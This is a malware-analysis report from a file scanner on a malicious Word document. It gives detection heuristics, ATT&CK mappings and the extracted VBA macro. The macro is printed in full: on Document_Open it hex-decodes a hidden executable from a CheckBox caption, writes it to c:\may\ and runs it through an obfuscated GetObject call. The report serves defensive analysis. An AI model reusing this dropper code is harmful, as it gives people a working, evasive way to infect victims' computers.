MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1071.001 Web Protocols
T1105 Ingress Tool Transfer
The sample contains a malicious VBA macro that executes upon opening the document. The macro is obfuscated and uses GetObject to decode and write a hex-encoded executable to disk in the 'c:\may\' directory, naming it with a random string and a '.exe' extension. This executable is then likely run, indicating a downloader or dropper functionality.
Heuristics 7
-
ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1920 bytes |
SHA-256: 8823726413b62b459df09e4dd2d19a913bf3c27d43ca26badd6326d21362370c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DocumentosTittle"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox1, 0, 0, MSForms, CheckBox"
Private Sub Document_Open()
Dim i, d
Dim strTemp$, strReturn$, hextostr$
Dim Splits$(), CurFolder$
Dim GenerateFileName$, sFile$, sValues$
Splits$ = Split("c:\may", "\")
For i = LBound(Splits) To UBound(Splits)
CurFolder = CurFolder + Splits(i) + "\"
If Dir(CurFolder, vbDirectory) = "" Then MkDir CurFolder
Next i
hextostr = DocumentosTittle.CheckBox1.Caption
For i = 1 To Len(hextostr) Step 2
strTemp = Chr(Val("&H" + Mid(hextostr, i, 2)))
strReturn = strReturn + strTemp
Next i
hextostr = Right(strReturn, Len(strReturn) - 1)
Randomize
sValues = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
sValues = sValues & UCase(sValues) & ""
For i = 1 To Val("7")
GenerateFileName = GenerateFileName & Mid(sValues, Int(Rnd() * Len(sValues) + 1), 1)
Next i
sFile = GenerateFileName
d = Chr$(99) + Chr$(58) + Chr$(92) + Chr$(109) + Chr$(97) + Chr$(121) + Chr$(92) + sFile + Chr$(46) + Chr$(101) + Chr$(120) + Chr$(101)
Open d For Binary As #1
Put #1, , Chr$(77) + hextostr + sFile
Close #1
Dim obj3
Set obj3 = GetObject(ChrW(110) + ChrW(101) + ChrW(119) + ChrW(58) + ChrW(49) + ChrW(51) + ChrW(55) + ChrW(48) _
+ ChrW(57) + ChrW(54) + ChrW(50) + ChrW(48) + ChrW(45) + ChrW(67) + ChrW(50) + ChrW(55) + ChrW(57) _
+ ChrW(45) + ChrW(49) + ChrW(49) + ChrW(67) + ChrW(69) + ChrW(45) + ChrW(65) + ChrW(52) + ChrW(57) _
+ ChrW(69) + ChrW(45) + ChrW(52) + ChrW(52) + ChrW(52) + ChrW(53) + ChrW(53) + ChrW(51) + ChrW(53) _
+ ChrW(52) + ChrW(48) + ChrW(48) + ChrW(48) + ChrW(48))
obj3.Open d
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes |
SHA-256: 7d8e51695f3f776eed1bbd8591fcf88bf2249ebd4084d2818462570106328237 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.